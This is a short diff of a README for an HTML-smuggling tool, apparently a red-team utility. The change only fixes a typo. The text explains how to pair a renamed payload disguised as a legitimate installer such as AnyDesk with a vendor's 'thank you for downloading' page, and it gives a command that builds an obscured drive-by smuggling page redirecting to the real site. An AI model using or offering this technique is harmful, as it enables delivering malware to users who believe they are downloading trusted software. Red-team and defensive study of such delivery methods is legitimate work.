six-two/self-unzip.html/README.md

 ![Driveby Redirect Screenshot](./driveby-redirect-screenshot.png)

 Just search for a "thank you for downloading" page that does not start a download.
-There are many of them for software like Skype, AnyDesk, etc. Then rename your payload file to something an visitor of the download page would expect and create the HTML smuggling page:
+There are many of them for software like Skype, AnyDesk, etc. Then rename your payload file to something a visitor of the download page would expect and create the HTML smuggling page:
 ```bash
 self-unzip-html html -i AnyDesk.exe -o anydesk-download.html --driveby-redirect https://anydesk.com/en/downloads/guide/thank-you --obscure-action
 ```